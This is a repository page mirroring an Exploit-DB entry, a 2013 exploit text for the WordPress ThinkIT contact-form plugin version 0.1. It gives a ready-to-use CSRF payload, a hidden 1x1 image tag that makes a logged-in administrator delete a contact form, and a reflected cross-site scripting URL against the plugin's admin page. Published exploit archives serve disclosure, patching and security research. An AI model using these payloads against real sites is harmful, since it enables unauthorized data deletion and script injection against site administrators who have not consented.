bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/php/webapps/27751.txt
Offensive Security 36c084c351 DB: 2021-09-03 
45419 changes to exploits/shellcodes

2 new exploits/shellcodes

Too many to list!
2021-09-03 13:39:06 +00:00

35 lines
No EOL
1.3 KiB
Text
Raw Blame History

###################################################################################################################################
# Exploit Title: Wordpress ThinkIT plugin - CSRF / XSS
# Date: 2013 15 August
# Exploit Author: Yashar shahinzadeh
# Special thanks to Mormoroth
# Credit goes for: http://y-shahinzadeh.ir & ha.cker.ir
# Vendor Homepage: http://thinkoverit.com/
# Tested on: Linux & Windows, PHP 5.2.9
# Affected Version : 0.1
#
# Contacts: { http://Twitter.com/YShahinzadeh , http://y-shahinzadeh.ir , http://Twitter.com/Mormoroth , http://mormoroth.ir }
###################################################################################################################################
Summary:
========
1. CSRF - Delete a form
2. Cross site scripting
1. CSRF - Delete a form:
========================
Contact form ID can be easily understood from HTML page source, <input type="hidden" value="[ID]" name="toit-form-id"></input>, which [ID] is the form ID, following crafted exploit may be used so as to delete form completely:
<img src="http://[WP]/wp-admin/admin.php?toitcf_current_id=[ID]&action=delete&page=toitcf" width="1" height="1">
Obviously, ID must be replaced.
2. Cross site scripting:
========================
http://[WP]/wordpress/wp-admin/admin.php?toitcf_current_id=[XSS]&page=toitcf
/** Yasshar shahinzadeh **/
Reference in a new issue View git blame Copy permalink